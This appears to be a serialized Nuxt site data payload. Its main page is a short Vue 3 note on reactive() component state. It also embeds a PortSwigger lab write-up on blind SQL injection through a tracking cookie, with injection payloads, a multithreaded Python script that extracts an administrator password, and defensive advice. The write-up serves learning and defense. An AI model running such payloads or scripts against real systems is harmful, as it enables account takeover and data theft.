[{"data":1,"prerenderedAt":1616},["ShallowReactive",2],{"page-en-\u002Fnotes\u002Ffrontend\u002Fcreate-component-state-like-options-api-using-reactive":3,"recent-en":346,"posts-en-frontend":1356},{"id":4,"title":5,"author":6,"body":7,"date":333,"description":334,"extension":335,"image":336,"meta":337,"navigation":85,"path":338,"seo":339,"sitemap":340,"stem":341,"tags":342,"__hash__":345},"content_en\u002Fnotes\u002Ffrontend\u002Fcreate-component-state-like-options-api-using-reactive.md","Creating component state like Options API using reactive()","Oleg Anuchin",{"type":8,"value":9,"toc":331},"minimark",[10,14,27,38,327],[11,12,5],"h1",{"id":13},"creating-component-state-like-options-api-using-reactive",[15,16,17,18,22,23,26],"p",{},"In Options API we can use ",[19,20,21],"code",{},"data()"," function to create a state for the component, then access it directly via ",[19,24,25],{},"this",".",[15,28,29,30,33,34,37],{},"Using ",[19,31,32],{},"reactive()"," from Composition API achieves the same pattern — much easier than using ",[19,35,36],{},"ref()"," for multiple state properties.",[39,40,45],"pre",{"className":41,"code":42,"language":43,"meta":44,"style":44},"language-vue shiki shiki-themes github-light github-dark","\u003Cscript>\nimport { computed, reactive, toRefs } from 'vue'\n\nexport default {\n  setup() {\n    const state = reactive({\n      price: 2,\n      quantity: 5\n    })\n\n    const total = computed(() => {\n      return state.price * state.quantity\n    })\n\n    return {\n      ...toRefs(state),\n      total\n    }\n  }\n}\n\u003C\u002Fscript>\n\n\u003Ctemplate>\n  \u003Cp>Price: {{ price }}\u003C\u002Fp>\n  \u003Cp>Quantity: {{ quantity }}\u003C\u002Fp>\n  \u003Cp>Total: {{ total 
}}\u003C\u002Fp>\n\u003C\u002Ftemplate>\n","vue","",[19,46,47,63,80,87,99,109,128,140,149,155,160,181,196,201,206,214,226,232,238,244,250,260,265,275,290,304,318],{"__ignoreMap":44},[48,49,52,56,60],"span",{"class":50,"line":51},"line",1,[48,53,55],{"class":54},"sVt8B","\u003C",[48,57,59],{"class":58},"s9eBZ","script",[48,61,62],{"class":54},">\n",[48,64,66,70,73,76],{"class":50,"line":65},2,[48,67,69],{"class":68},"szBVR","import",[48,71,72],{"class":54}," { computed, reactive, toRefs } ",[48,74,75],{"class":68},"from",[48,77,79],{"class":78},"sZZnC"," 'vue'\n",[48,81,83],{"class":50,"line":82},3,[48,84,86],{"emptyLinePlaceholder":85},true,"\n",[48,88,90,93,96],{"class":50,"line":89},4,[48,91,92],{"class":68},"export",[48,94,95],{"class":68}," default",[48,97,98],{"class":54}," {\n",[48,100,102,106],{"class":50,"line":101},5,[48,103,105],{"class":104},"sScJk","  setup",[48,107,108],{"class":54},"() {\n",[48,110,112,115,119,122,125],{"class":50,"line":111},6,[48,113,114],{"class":68},"    const",[48,116,118],{"class":117},"sj4cs"," state",[48,120,121],{"class":68}," =",[48,123,124],{"class":104}," reactive",[48,126,127],{"class":54},"({\n",[48,129,131,134,137],{"class":50,"line":130},7,[48,132,133],{"class":54},"      price: ",[48,135,136],{"class":117},"2",[48,138,139],{"class":54},",\n",[48,141,143,146],{"class":50,"line":142},8,[48,144,145],{"class":54},"      quantity: ",[48,147,148],{"class":117},"5\n",[48,150,152],{"class":50,"line":151},9,[48,153,154],{"class":54},"    })\n",[48,156,158],{"class":50,"line":157},10,[48,159,86],{"emptyLinePlaceholder":85},[48,161,163,165,168,170,173,176,179],{"class":50,"line":162},11,[48,164,114],{"class":68},[48,166,167],{"class":117}," total",[48,169,121],{"class":68},[48,171,172],{"class":104}," computed",[48,174,175],{"class":54},"(() ",[48,177,178],{"class":68},"=>",[48,180,98],{"class":54},[48,182,184,187,190,193],{"class":50,"line":183},12,[48,185,186],{"class":68},"      return",[48,188,189],{"class":54}," state.price 
",[48,191,192],{"class":68},"*",[48,194,195],{"class":54}," state.quantity\n",[48,197,199],{"class":50,"line":198},13,[48,200,154],{"class":54},[48,202,204],{"class":50,"line":203},14,[48,205,86],{"emptyLinePlaceholder":85},[48,207,209,212],{"class":50,"line":208},15,[48,210,211],{"class":68},"    return",[48,213,98],{"class":54},[48,215,217,220,223],{"class":50,"line":216},16,[48,218,219],{"class":68},"      ...",[48,221,222],{"class":104},"toRefs",[48,224,225],{"class":54},"(state),\n",[48,227,229],{"class":50,"line":228},17,[48,230,231],{"class":54},"      total\n",[48,233,235],{"class":50,"line":234},18,[48,236,237],{"class":54},"    }\n",[48,239,241],{"class":50,"line":240},19,[48,242,243],{"class":54},"  }\n",[48,245,247],{"class":50,"line":246},20,[48,248,249],{"class":54},"}\n",[48,251,253,256,258],{"class":50,"line":252},21,[48,254,255],{"class":54},"\u003C\u002F",[48,257,59],{"class":58},[48,259,62],{"class":54},[48,261,263],{"class":50,"line":262},22,[48,264,86],{"emptyLinePlaceholder":85},[48,266,268,270,273],{"class":50,"line":267},23,[48,269,55],{"class":54},[48,271,272],{"class":58},"template",[48,274,62],{"class":54},[48,276,278,281,283,286,288],{"class":50,"line":277},24,[48,279,280],{"class":54},"  \u003C",[48,282,15],{"class":58},[48,284,285],{"class":54},">Price: {{ price }}\u003C\u002F",[48,287,15],{"class":58},[48,289,62],{"class":54},[48,291,293,295,297,300,302],{"class":50,"line":292},25,[48,294,280],{"class":54},[48,296,15],{"class":58},[48,298,299],{"class":54},">Quantity: {{ quantity }}\u003C\u002F",[48,301,15],{"class":58},[48,303,62],{"class":54},[48,305,307,309,311,314,316],{"class":50,"line":306},26,[48,308,280],{"class":54},[48,310,15],{"class":58},[48,312,313],{"class":54},">Total: {{ total }}\u003C\u002F",[48,315,15],{"class":58},[48,317,62],{"class":54},[48,319,321,323,325],{"class":50,"line":320},27,[48,322,255],{"class":54},[48,324,272],{"class":58},[48,326,62],{"class":54},[328,329,330],"style",{},"html pre.shiki code .sVt8B, 
html code.shiki .sVt8B{--shiki-default:#24292E;--shiki-dark:#E1E4E8}html pre.shiki code .s9eBZ, html code.shiki .s9eBZ{--shiki-default:#22863A;--shiki-dark:#85E89D}html pre.shiki code .szBVR, html code.shiki .szBVR{--shiki-default:#D73A49;--shiki-dark:#F97583}html pre.shiki code .sZZnC, html code.shiki .sZZnC{--shiki-default:#032F62;--shiki-dark:#9ECBFF}html pre.shiki code .sScJk, html code.shiki .sScJk{--shiki-default:#6F42C1;--shiki-dark:#B392F0}html pre.shiki code .sj4cs, html code.shiki .sj4cs{--shiki-default:#005CC5;--shiki-dark:#79B8FF}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":44,"searchDepth":65,"depth":65,"links":332},[],"2022-08-20","How to use reactive() in Vue 3 Composition API to create component state similar to Options API 
data()","md",null,{},"\u002Fnotes\u002Ffrontend\u002Fcreate-component-state-like-options-api-using-reactive",{"title":5,"description":334},{"loc":338},"notes\u002Ffrontend\u002Fcreate-component-state-like-options-api-using-reactive",[43,343,344],"composition-api","reactive","96O7U6Y83TlYNqqAf521cyGpqClhv0qB2l1dmJtT0pw",[347,950,1177,1228],{"id":348,"title":349,"author":350,"body":351,"date":937,"description":938,"extension":335,"image":336,"meta":939,"navigation":85,"path":940,"seo":941,"sitemap":942,"stem":943,"tags":944,"__hash__":949},"content_en\u002Fnotes\u002Fpentesting\u002Fportswigger-sqli-blind-conditional-responses.md","Blind SQL Injection with Conditional Responses (PortSwigger Lab)","apsyleg",{"type":8,"value":352,"toc":926},[353,357,362,369,388,392,418,422,429,432,440,447,450,481,484,488,493,500,509,519,523,529,544,547,551,558,877,883,894,898,901,906,923],[11,354,356],{"id":355},"blind-sql-injection-with-conditional-responses","Blind SQL Injection with Conditional Responses",[358,359,361],"h2",{"id":360},"vulnerability","Vulnerability",[15,363,364,368],{},[365,366,367],"strong",{},"Blind SQL injection"," is a class of SQL injection where the application does not return query results or error messages in the HTTP response. Instead, the attacker infers information by observing differences in application behavior — such as whether a particular message appears, or whether the response takes longer.",[15,370,371,372,375,376,379,380,383,384,387],{},"In this variant (",[365,373,374],{},"boolean-based blind SQLi","), the application returns different content depending on whether the injected condition evaluates to ",[19,377,378],{},"TRUE"," or ",[19,381,382],{},"FALSE",". 
By crafting conditions like ",[19,385,386],{},"SUBSTRING(password, 1, 1) = 'a'",", an attacker can extract data one character at a time.",[358,389,391],{"id":390},"lab","Lab",[15,393,394,397,398,405,408,411,412,414,417],{},[365,395,396],{},"Name:"," ",[399,400,404],"a",{"href":401,"rel":402},"https:\u002F\u002Fportswigger.net\u002Fweb-security\u002Fsql-injection\u002Fblind\u002Flab-conditional-responses",[403],"nofollow","Blind SQL injection with conditional responses",[406,407],"br",{},[365,409,410],{},"Difficulty:"," Practitioner",[406,413],{},[365,415,416],{},"Goal:"," Exploit a blind SQL injection vulnerability in a tracking cookie to extract the administrator's password and log in.",[358,419,421],{"id":420},"reconnaissance","Reconnaissance",[15,423,424,425,428],{},"The application stores a ",[19,426,427],{},"TrackingId"," cookie that is used in an SQL query. The query result is never displayed, but a \"Welcome back!\" message appears on the page when the query returns at least one row.",[15,430,431],{},"First, we confirm the injection point by appending a quote:",[39,433,438],{"className":434,"code":436,"language":437},[435],"language-text","TrackingId=ncJfdwqSUQK7Gh4b'--\n","text",[19,439,436],{"__ignoreMap":44},[15,441,442,443,446],{},"The \"Welcome back!\" message still appears — the comment ",[19,444,445],{},"--"," neutralizes the rest of the original query, so the injection is active.",[15,448,449],{},"Next, we verify boolean behavior:",[39,451,455],{"className":452,"code":453,"language":454,"meta":44,"style":44},"language-sql shiki shiki-themes github-light github-dark","-- TRUE condition → \"Welcome back!\" appears\nTrackingId=ncJfdwqSUQK7Gh4b' AND 1=1--\n\n-- FALSE condition → \"Welcome back!\" disappears\nTrackingId=ncJfdwqSUQK7Gh4b' AND 1=0--\n","sql",[19,456,457,462,467,471,476],{"__ignoreMap":44},[48,458,459],{"class":50,"line":51},[48,460,461],{},"-- TRUE condition → \"Welcome back!\" 
appears\n",[48,463,464],{"class":50,"line":65},[48,465,466],{},"TrackingId=ncJfdwqSUQK7Gh4b' AND 1=1--\n",[48,468,469],{"class":50,"line":82},[48,470,86],{"emptyLinePlaceholder":85},[48,472,473],{"class":50,"line":89},[48,474,475],{},"-- FALSE condition → \"Welcome back!\" disappears\n",[48,477,478],{"class":50,"line":101},[48,479,480],{},"TrackingId=ncJfdwqSUQK7Gh4b' AND 1=0--\n",[15,482,483],{},"We now have a reliable oracle: if the injected condition is true, the message appears; if false, it does not. This is enough to extract any data from the database bit by bit.",[358,485,487],{"id":486},"exploitation","Exploitation",[489,490,492],"h3",{"id":491},"step-1-determine-password-length","Step 1 — Determine password length",[15,494,495,496,499],{},"We use ",[19,497,498],{},"LENGTH()"," to find how many characters the administrator's password has:",[39,501,503],{"className":452,"code":502,"language":454,"meta":44,"style":44},"TrackingId=...'+AND+LENGTH((SELECT+password+FROM+users+WHERE+username='administrator'))=20--\n",[19,504,505],{"__ignoreMap":44},[48,506,507],{"class":50,"line":51},[48,508,502],{},[15,510,511,512,515,516,26],{},"\"Welcome back!\" appears at ",[19,513,514],{},"= 20"," — the password is ",[365,517,518],{},"20 characters long",[489,520,522],{"id":521},"step-2-extract-characters","Step 2 — Extract characters",[15,524,495,525,528],{},[19,526,527],{},"SUBSTRING(string, position, length)"," to test one character at a time:",[39,530,532],{"className":452,"code":531,"language":454,"meta":44,"style":44},"-- Is the 1st character 'w'?\nTrackingId=...'+AND+SUBSTRING((SELECT+password+FROM+users+WHERE+username='administrator'),1,1)='w'--\n",[19,533,534,539],{"__ignoreMap":44},[48,535,536],{"class":50,"line":51},[48,537,538],{},"-- Is the 1st character 'w'?\n",[48,540,541],{"class":50,"line":65},[48,542,543],{},"TrackingId=...'+AND+SUBSTRING((SELECT+password+FROM+users+WHERE+username='administrator'),1,1)='w'--\n",[15,545,546],{},"Doing this manually for 20 
characters × 36 possible values (a–z + 0–9) would take hundreds of requests. We automate it with a Python script.",[489,548,550],{"id":549},"step-3-automate-with-python","Step 3 — Automate with Python",[15,552,553,554,557],{},"The script uses ",[19,555,556],{},"ThreadPoolExecutor"," to run 10 requests in parallel, dramatically reducing extraction time:",[39,559,563],{"className":560,"code":561,"language":562,"meta":44,"style":44},"language-python shiki shiki-themes github-light github-dark","import requests\nimport string\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\n\nHOST = \"0a7100260337b44880b2629c0027006c.web-security-academy.net\"\nBASE_URL = f\"https:\u002F\u002F{HOST}\u002Ffilter?category=Gifts\"\nTRACKING_ID = \"ncJfdwqSUQK7Gh4b\"\nSESSION = \"mtuIxpMFzxZA2eGtxMv2idcobVsAqTtk\"\n\nCHARSET = string.ascii_lowercase + string.digits\nMAX_LENGTH = 30\nTHREADS = 10\n\n\ndef check(sql_condition: str) -> bool:\n    payload = f\"{TRACKING_ID}'+AND+{sql_condition}--\"\n    cookies = {\"TrackingId\": payload, \"session\": SESSION}\n    r = requests.get(BASE_URL, cookies=cookies, timeout=10)\n    return \"Welcome back\" in r.text\n\n\ndef get_password_length(max_len: int = MAX_LENGTH) -> int:\n    print(\"[*] Determining password length...\")\n    for n in range(1, max_len + 1):\n        condition = f\"LENGTH((SELECT+password+FROM+users+WHERE+username='administrator'))={n}\"\n        if check(condition):\n            print(f\"[+] Password length: {n}\")\n            return n\n    raise ValueError(f\"Password length not found within {max_len}\")\n\n\ndef get_char_at(pos: int, length: int) -> tuple[int, str]:\n    for c in CHARSET:\n        condition = f\"SUBSTRING((SELECT+password+FROM+users+WHERE+username='administrator'),{pos},1)='{c}'\"\n        if check(condition):\n            return pos, c\n    return pos, \"?\"\n\n\ndef get_password(length: int) -> str:\n    print(f\"[*] Brute-forcing {length} characters with {THREADS} threads...\")\n    
password = [\"?\"] * length\n    with ThreadPoolExecutor(max_workers=THREADS) as executor:\n        futures = {executor.submit(get_char_at, pos, length): pos for pos in range(1, length + 1)}\n        for future in as_completed(futures):\n            pos, char = future.result()\n            password[pos - 1] = char\n            print(f\"  [{pos}\u002F{length}] '{char}' => {''.join(password)}\")\n    return \"\".join(password)\n\n\ndef main():\n    length = get_password_length()\n    password = get_password(length)\n    print(f\"\\n[+] Password: {password}\")\n\n\nif __name__ == \"__main__\":\n    main()\n","python",[19,564,565,570,575,580,584,589,594,599,604,608,613,618,623,627,631,636,641,646,651,656,660,664,669,674,679,684,689,694,700,706,711,716,722,728,734,739,745,751,756,761,767,773,779,785,791,797,803,809,815,821,826,831,837,843,849,855,860,865,871],{"__ignoreMap":44},[48,566,567],{"class":50,"line":51},[48,568,569],{},"import requests\n",[48,571,572],{"class":50,"line":65},[48,573,574],{},"import string\n",[48,576,577],{"class":50,"line":82},[48,578,579],{},"from concurrent.futures import ThreadPoolExecutor, as_completed\n",[48,581,582],{"class":50,"line":89},[48,583,86],{"emptyLinePlaceholder":85},[48,585,586],{"class":50,"line":101},[48,587,588],{},"HOST = \"0a7100260337b44880b2629c0027006c.web-security-academy.net\"\n",[48,590,591],{"class":50,"line":111},[48,592,593],{},"BASE_URL = f\"https:\u002F\u002F{HOST}\u002Ffilter?category=Gifts\"\n",[48,595,596],{"class":50,"line":130},[48,597,598],{},"TRACKING_ID = \"ncJfdwqSUQK7Gh4b\"\n",[48,600,601],{"class":50,"line":142},[48,602,603],{},"SESSION = \"mtuIxpMFzxZA2eGtxMv2idcobVsAqTtk\"\n",[48,605,606],{"class":50,"line":151},[48,607,86],{"emptyLinePlaceholder":85},[48,609,610],{"class":50,"line":157},[48,611,612],{},"CHARSET = string.ascii_lowercase + string.digits\n",[48,614,615],{"class":50,"line":162},[48,616,617],{},"MAX_LENGTH = 30\n",[48,619,620],{"class":50,"line":183},[48,621,622],{},"THREADS = 
10\n",[48,624,625],{"class":50,"line":198},[48,626,86],{"emptyLinePlaceholder":85},[48,628,629],{"class":50,"line":203},[48,630,86],{"emptyLinePlaceholder":85},[48,632,633],{"class":50,"line":208},[48,634,635],{},"def check(sql_condition: str) -> bool:\n",[48,637,638],{"class":50,"line":216},[48,639,640],{},"    payload = f\"{TRACKING_ID}'+AND+{sql_condition}--\"\n",[48,642,643],{"class":50,"line":228},[48,644,645],{},"    cookies = {\"TrackingId\": payload, \"session\": SESSION}\n",[48,647,648],{"class":50,"line":234},[48,649,650],{},"    r = requests.get(BASE_URL, cookies=cookies, timeout=10)\n",[48,652,653],{"class":50,"line":240},[48,654,655],{},"    return \"Welcome back\" in r.text\n",[48,657,658],{"class":50,"line":246},[48,659,86],{"emptyLinePlaceholder":85},[48,661,662],{"class":50,"line":252},[48,663,86],{"emptyLinePlaceholder":85},[48,665,666],{"class":50,"line":262},[48,667,668],{},"def get_password_length(max_len: int = MAX_LENGTH) -> int:\n",[48,670,671],{"class":50,"line":267},[48,672,673],{},"    print(\"[*] Determining password length...\")\n",[48,675,676],{"class":50,"line":277},[48,677,678],{},"    for n in range(1, max_len + 1):\n",[48,680,681],{"class":50,"line":292},[48,682,683],{},"        condition = f\"LENGTH((SELECT+password+FROM+users+WHERE+username='administrator'))={n}\"\n",[48,685,686],{"class":50,"line":306},[48,687,688],{},"        if check(condition):\n",[48,690,691],{"class":50,"line":320},[48,692,693],{},"            print(f\"[+] Password length: {n}\")\n",[48,695,697],{"class":50,"line":696},28,[48,698,699],{},"            return n\n",[48,701,703],{"class":50,"line":702},29,[48,704,705],{},"    raise ValueError(f\"Password length not found within {max_len}\")\n",[48,707,709],{"class":50,"line":708},30,[48,710,86],{"emptyLinePlaceholder":85},[48,712,714],{"class":50,"line":713},31,[48,715,86],{"emptyLinePlaceholder":85},[48,717,719],{"class":50,"line":718},32,[48,720,721],{},"def get_char_at(pos: int, length: int) -> tuple[int, 
str]:\n",[48,723,725],{"class":50,"line":724},33,[48,726,727],{},"    for c in CHARSET:\n",[48,729,731],{"class":50,"line":730},34,[48,732,733],{},"        condition = f\"SUBSTRING((SELECT+password+FROM+users+WHERE+username='administrator'),{pos},1)='{c}'\"\n",[48,735,737],{"class":50,"line":736},35,[48,738,688],{},[48,740,742],{"class":50,"line":741},36,[48,743,744],{},"            return pos, c\n",[48,746,748],{"class":50,"line":747},37,[48,749,750],{},"    return pos, \"?\"\n",[48,752,754],{"class":50,"line":753},38,[48,755,86],{"emptyLinePlaceholder":85},[48,757,759],{"class":50,"line":758},39,[48,760,86],{"emptyLinePlaceholder":85},[48,762,764],{"class":50,"line":763},40,[48,765,766],{},"def get_password(length: int) -> str:\n",[48,768,770],{"class":50,"line":769},41,[48,771,772],{},"    print(f\"[*] Brute-forcing {length} characters with {THREADS} threads...\")\n",[48,774,776],{"class":50,"line":775},42,[48,777,778],{},"    password = [\"?\"] * length\n",[48,780,782],{"class":50,"line":781},43,[48,783,784],{},"    with ThreadPoolExecutor(max_workers=THREADS) as executor:\n",[48,786,788],{"class":50,"line":787},44,[48,789,790],{},"        futures = {executor.submit(get_char_at, pos, length): pos for pos in range(1, length + 1)}\n",[48,792,794],{"class":50,"line":793},45,[48,795,796],{},"        for future in as_completed(futures):\n",[48,798,800],{"class":50,"line":799},46,[48,801,802],{},"            pos, char = future.result()\n",[48,804,806],{"class":50,"line":805},47,[48,807,808],{},"            password[pos - 1] = char\n",[48,810,812],{"class":50,"line":811},48,[48,813,814],{},"            print(f\"  [{pos}\u002F{length}] '{char}' => {''.join(password)}\")\n",[48,816,818],{"class":50,"line":817},49,[48,819,820],{},"    return 
\"\".join(password)\n",[48,822,824],{"class":50,"line":823},50,[48,825,86],{"emptyLinePlaceholder":85},[48,827,829],{"class":50,"line":828},51,[48,830,86],{"emptyLinePlaceholder":85},[48,832,834],{"class":50,"line":833},52,[48,835,836],{},"def main():\n",[48,838,840],{"class":50,"line":839},53,[48,841,842],{},"    length = get_password_length()\n",[48,844,846],{"class":50,"line":845},54,[48,847,848],{},"    password = get_password(length)\n",[48,850,852],{"class":50,"line":851},55,[48,853,854],{},"    print(f\"\\n[+] Password: {password}\")\n",[48,856,858],{"class":50,"line":857},56,[48,859,86],{"emptyLinePlaceholder":85},[48,861,863],{"class":50,"line":862},57,[48,864,86],{"emptyLinePlaceholder":85},[48,866,868],{"class":50,"line":867},58,[48,869,870],{},"if __name__ == \"__main__\":\n",[48,872,874],{"class":50,"line":873},59,[48,875,876],{},"    main()\n",[15,878,879,880],{},"Result: ",[19,881,882],{},"wfa3n32o7a6mb4xon7d6",[15,884,885,886,889,890,893],{},"Log in to ",[19,887,888],{},"\u002Fmy-account"," as ",[19,891,892],{},"administrator"," with this password — lab solved.",[358,895,897],{"id":896},"conclusion","Conclusion",[15,899,900],{},"Blind SQL injection is more subtle than classic SQLi but equally dangerous. 
Even without any output, a single boolean signal (message present \u002F absent) is enough to extract the entire database.",[15,902,903],{},[365,904,905],{},"How to defend:",[907,908,909,913,916],"ul",{},[910,911,912],"li",{},"Use parameterized queries (prepared statements) — they keep user input out of the SQL text, which eliminates injection for every value that is bound",[910,914,915],{},"Never concatenate user input directly into SQL strings — cookie values such as TrackingId are user input too",[910,917,918,919,922],{},"Apply least privilege to database accounts — the database account used for the tracking query should not have access to the ",[19,920,921],{},"users"," table, which limits what a successful injection can read",[328,924,925],{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":44,"searchDepth":65,"depth":65,"links":927},[928,929,930,931,936],{"id":360,"depth":65,"text":361},{"id":390,"depth":65,"text":391},{"id":420,"depth":65,"text":421},{"id":486,"depth":65,"text":487,"children":932},[933,934,935],{"id":491,"depth":82,"text":492},{"id":521,"depth":82,"text":522},{"id":549,"depth":82,"text":550},{"id":896,"depth":65,"text":897},"2026-03-28","How to exploit blind SQL injection via a tracking cookie using boolean-based inference and a multithreaded Python 
script.",{},"\u002Fnotes\u002Fpentesting\u002Fportswigger-sqli-blind-conditional-responses",{"title":349,"description":938},{"loc":940},"notes\u002Fpentesting\u002Fportswigger-sqli-blind-conditional-responses",[945,946,947,948],"portswigger","sql-injection","blind-sqli","web-security","xjqLMT0ON2Iphb3NwOgTkgmjGcHATsLRPcyMBeD0IF4",{"id":4,"title":5,"author":6,"body":951,"date":333,"description":334,"extension":335,"image":336,"meta":1173,"navigation":85,"path":338,"seo":1174,"sitemap":1175,"stem":341,"tags":1176,"__hash__":345},{"type":8,"value":952,"toc":1171},[953,955,961,967,1169],[11,954,5],{"id":13},[15,956,17,957,22,959,26],{},[19,958,21],{},[19,960,25],{},[15,962,29,963,33,965,37],{},[19,964,32],{},[19,966,36],{},[39,968,969],{"className":41,"code":42,"language":43,"meta":44,"style":44},[19,970,971,979,989,993,1001,1007,1019,1027,1033,1037,1041,1057,1067,1071,1075,1081,1089,1093,1097,1101,1105,1113,1117,1125,1137,1149,1161],{"__ignoreMap":44},[48,972,973,975,977],{"class":50,"line":51},[48,974,55],{"class":54},[48,976,59],{"class":58},[48,978,62],{"class":54},[48,980,981,983,985,987],{"class":50,"line":65},[48,982,69],{"class":68},[48,984,72],{"class":54},[48,986,75],{"class":68},[48,988,79],{"class":78},[48,990,991],{"class":50,"line":82},[48,992,86],{"emptyLinePlaceholder":85},[48,994,995,997,999],{"class":50,"line":89},[48,996,92],{"class":68},[48,998,95],{"class":68},[48,1000,98],{"class":54},[48,1002,1003,1005],{"class":50,"line":101},[48,1004,105],{"class":104},[48,1006,108],{"class":54},[48,1008,1009,1011,1013,1015,1017],{"class":50,"line":111},[48,1010,114],{"class":68},[48,1012,118],{"class":117},[48,1014,121],{"class":68},[48,1016,124],{"class":104},[48,1018,127],{"class":54},[48,1020,1021,1023,1025],{"class":50,"line":130},[48,1022,133],{"class":54},[48,1024,136],{"class":117},[48,1026,139],{"class":54},[48,1028,1029,1031],{"class":50,"line":142},[48,1030,145],{"class":54},[48,1032,148],{"class":117},[48,1034,1035],{"class":50,"line":151},[48,1036,1
54],{"class":54},[48,1038,1039],{"class":50,"line":157},[48,1040,86],{"emptyLinePlaceholder":85},[48,1042,1043,1045,1047,1049,1051,1053,1055],{"class":50,"line":162},[48,1044,114],{"class":68},[48,1046,167],{"class":117},[48,1048,121],{"class":68},[48,1050,172],{"class":104},[48,1052,175],{"class":54},[48,1054,178],{"class":68},[48,1056,98],{"class":54},[48,1058,1059,1061,1063,1065],{"class":50,"line":183},[48,1060,186],{"class":68},[48,1062,189],{"class":54},[48,1064,192],{"class":68},[48,1066,195],{"class":54},[48,1068,1069],{"class":50,"line":198},[48,1070,154],{"class":54},[48,1072,1073],{"class":50,"line":203},[48,1074,86],{"emptyLinePlaceholder":85},[48,1076,1077,1079],{"class":50,"line":208},[48,1078,211],{"class":68},[48,1080,98],{"class":54},[48,1082,1083,1085,1087],{"class":50,"line":216},[48,1084,219],{"class":68},[48,1086,222],{"class":104},[48,1088,225],{"class":54},[48,1090,1091],{"class":50,"line":228},[48,1092,231],{"class":54},[48,1094,1095],{"class":50,"line":234},[48,1096,237],{"class":54},[48,1098,1099],{"class":50,"line":240},[48,1100,243],{"class":54},[48,1102,1103],{"class":50,"line":246},[48,1104,249],{"class":54},[48,1106,1107,1109,1111],{"class":50,"line":252},[48,1108,255],{"class":54},[48,1110,59],{"class":58},[48,1112,62],{"class":54},[48,1114,1115],{"class":50,"line":262},[48,1116,86],{"emptyLinePlaceholder":85},[48,1118,1119,1121,1123],{"class":50,"line":267},[48,1120,55],{"class":54},[48,1122,272],{"class":58},[48,1124,62],{"class":54},[48,1126,1127,1129,1131,1133,1135],{"class":50,"line":277},[48,1128,280],{"class":54},[48,1130,15],{"class":58},[48,1132,285],{"class":54},[48,1134,15],{"class":58},[48,1136,62],{"class":54},[48,1138,1139,1141,1143,1145,1147],{"class":50,"line":292},[48,1140,280],{"class":54},[48,1142,15],{"class":58},[48,1144,299],{"class":54},[48,1146,15],{"class":58},[48,1148,62],{"class":54},[48,1150,1151,1153,1155,1157,1159],{"class":50,"line":306},[48,1152,280],{"class":54},[48,1154,15],{"class":58},[48,1156,313],
{"class":54},[48,1158,15],{"class":58},[48,1160,62],{"class":54},[48,1162,1163,1165,1167],{"class":50,"line":320},[48,1164,255],{"class":54},[48,1166,272],{"class":58},[48,1168,62],{"class":54},[328,1170,330],{},{"title":44,"searchDepth":65,"depth":65,"links":1172},[],{},{"title":5,"description":334},{"loc":338},[43,343,344],{"id":1178,"title":1179,"author":6,"body":1180,"date":1217,"description":1218,"extension":335,"image":336,"meta":1219,"navigation":85,"path":1220,"seo":1221,"sitemap":1222,"stem":1223,"tags":1224,"__hash__":1227},"content_en\u002Fnotes\u002Ffrontend\u002Fhow-to-upgrade-nuxt-3.md","How to upgrade Nuxt 3 project",{"type":8,"value":1181,"toc":1215},[1182,1185,1203,1206,1212],[11,1183,1179],{"id":1184},"how-to-upgrade-nuxt-3-project",[39,1186,1190],{"className":1187,"code":1188,"language":1189,"meta":44,"style":44},"language-bash shiki shiki-themes github-light github-dark","yarn nuxi upgrade\n","bash",[19,1191,1192],{"__ignoreMap":44},[48,1193,1194,1197,1200],{"class":50,"line":51},[48,1195,1196],{"class":104},"yarn",[48,1198,1199],{"class":78}," nuxi",[48,1201,1202],{"class":78}," upgrade\n",[15,1204,1205],{},"Example output:",[39,1207,1210],{"className":1208,"code":1209,"language":437},[435],"✔ Successfully upgraded nuxt from 3.0.0-rc.4-27605536.8c2c80e to 3.0.0-rc.4\n",[19,1211,1209],{"__ignoreMap":44},[328,1213,1214],{},"html pre.shiki code .sScJk, html code.shiki .sScJk{--shiki-default:#6F42C1;--shiki-dark:#B392F0}html pre.shiki code .sZZnC, html code.shiki .sZZnC{--shiki-default:#032F62;--shiki-dark:#9ECBFF}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: 
